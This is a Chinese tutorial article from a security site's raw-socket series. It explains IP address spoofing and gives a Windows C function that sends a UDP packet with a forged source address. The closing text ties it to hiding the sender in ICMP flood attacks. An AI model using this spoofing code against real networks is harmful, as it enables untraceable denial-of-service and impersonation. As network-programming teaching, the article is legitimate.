网络安全参考 | UNIX参考 | GPS参考 | 无线参考 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
网站地图 RSS订阅
高级搜索 收藏本站
Home | 业界动态 | 防火墙 | IDS/IPS | VPN | PKI | Honeypot | Hacker/Intruder | 黑客技术 | 破解技术 | 加密技术 | 病毒防护 | 木马 | 反垃圾邮件 | 反流氓软件 | 漏洞 | 无线安全 | UNIX | Windows | 安全编程 | 安全软件 | TPM/TCG | 数据恢复 | 企业信息安全 | 个人信息安全
 当前位置: Home > 安全编程 > 网络编程 > 文章  
原始套接字透析之实现IP地址欺骗
文章来源: 天极开发 文章作者: 宋宝华 发布时间: 2006-11-18   字体: [ ]
 

  由于使用Raw Socket的时候,IP报头可完全由程序员自定义,所以我们可以任意地修改本地发送包的IP地址,使得接收方错误的认为IP报文是由欺骗地址发出的。

  下面的程序演示了向某目标发送IP地址伪装的UDP报文的过程:

void sendPesuoIpUDP(void)
{
 WSADATA wsd;
 if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)
 {
  printf("WSAStartup() failed: %d ", GetLastError());
  return;
 }
 SOCKET s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0,WSA_FLAG_OVERLAPPED); // Create a raw socket
 if (s == INVALID_SOCKET)
 {
  printf("WSASocket() failed: %d ", WSAGetLastError());
  return - 1;
 }

 BOOL bOpt = TRUE;
 int ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char*) &bOpt, sizeof(bOpt));
 // 使用IP_HDRINCL
 if (ret == SOCKET_ERROR)
 {
  printf("setsockopt(IP_HDRINCL) failed: %d ", WSAGetLastError());
  return - 1;
 }

 const int BUFFER_SIZE = 80;
 char buffer[BUFFER_SIZE];

 const char *strMessage = "treat demo"; // Message to send

 // Set IP header
 IP_HDR ipHdr;
 UDP_HDR udpHdr;

 const unsigned short iIPSize = sizeof(ipHdr) / sizeof(unsigned long);
 const unsigned short iIPVersion = 4;
 ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
 ipHdr.ip_tos = 0; // IP type of service
 const unsigned short iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + strlen(strMessage);
 ipHdr.ip_totallength = htons(iTotalSize); // Total packet len
 ipHdr.ip_id = 0; // Unique identifier: set to 0
 ipHdr.ip_offset = 0; // Fragment offset field
 ipHdr.ip_ttl = 128; // Time to live
 ipHdr.ip_protocol = 0x11; // Protocol(UDP)
 ipHdr.ip_checksum = 0; // IP checksum
 const char *target_ip_address = "192.168.0.102";
 const char *treat_ip_address = "1.0.5.7";
 ipHdr.ip_destaddr = inet_addr(target_ip_address); // 接收方IP地址
 ipHdr.ip_srcaddr = inet_addr(treat_ip_address); // 发送方伪造的IP地址

 // Set UDP header
 const u_short uToPort = 8000;
 udpHdr.dst_portno = htons(uToPort); // 接收方端口

 const u_short uFromPort = 1000;
 udpHdr.src_portno = htons(uFromPort); // 发送伪造的端口

 const unsigned short iUdpSize = sizeof(udpHdr) + strlen(strMessage);
 udpHdr.udp_length = htons(iUdpSize);
 udpHdr.udp_checksum = 0;

 // 组建待发送的UDP报文
 ZeroMemory(buffer, BUFFER_SIZE);
 char *ptr = buffer;

 memcpy(ptr, &ipHdr, sizeof(ipHdr));

 ptr += sizeof(ipHdr);
 memcpy(ptr, &udpHdr, sizeof(udpHdr));

 ptr += sizeof(udpHdr);
 memcpy(ptr, strMessage, strlen(strMessage));

 // Apparently, this SOCKADDR_IN structure makes no difference.
 // Whatever we put as the destination IP addr in the IP header is what goes.
 // Specifying a different destination in remote will be ignored.

 sockaddr_in remote;
 remote.sin_family = AF_INET;
 remote.sin_port = htons(8000);
 remote.sin_addr.s_addr = inet_addr("192.168.0.102");

 printf("TO %s:%d ", target_ip_address, uToPort);

 ret = sendto(s, buffer, iTotalSize, 0, (SOCKADDR*) &remote, sizeof(remote));
 // 发送伪造的报文
 if (ret == SOCKET_ERROR)
 {
  printf("sendto() failed: %d ", WSAGetLastError());
 }
 else
  printf("sent %d bytes ", ret);

 closesocket(s);
 WSACleanup();
 return;
}

  如果我们在第4节描述的ICMP FLOOD攻击中伪造IP地址,则对方将无法检测出究竟是谁在对其进行攻击,实际上,这也是一种非常常用的黑客攻击中隐藏自身的途径。

  (参考链接: http://dev.yesky.com/130/2674130.shtml)

 
推荐文章
·洪水攻击原理及代码实现全攻略(
·原始套接字透析之综合实例:网络
·原始套接字透析之ARP欺骗
·原始套接字透析之实现包分析
·原始套接字透析之实现sniffer
·原始套接字透析之实现路由欺骗
·原始套接字透析之ICMP拒绝服务攻
·原始套接字透析之实现Ping
·原始套接字透析之Raw Socket基础
·黑客之旅 -- 原始套接字透析之前
 
 
↑返回顶部   打印本页   关闭窗口↓  

Google
 
Web oldhand.org unixreference.net meshmea.org
热点文章
·原始套接字透析之Raw So
·原始套接字透析之ARP欺
·洪水攻击原理及代码实现
·原始套接字透析之综合实
·原始套接字透析之实现Pi
·黑客之旅 -- 原始套接字
·原始套接字透析之实现路
·原始套接字透析之实现包
相关分类
相关文章
·原始套接字透析之综合实
·原始套接字透析之ARP欺
·洪水攻击原理及代码实现
·原始套接字透析之实现包
·原始套接字透析之实现sn
·原始套接字透析之实现路
·原始套接字透析之ICMP拒
·原始套接字透析之实现Pi
更多...
 
 

Copyright(c) 2001-2008 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.3 2007/02/10 12:00:37 yjs Exp $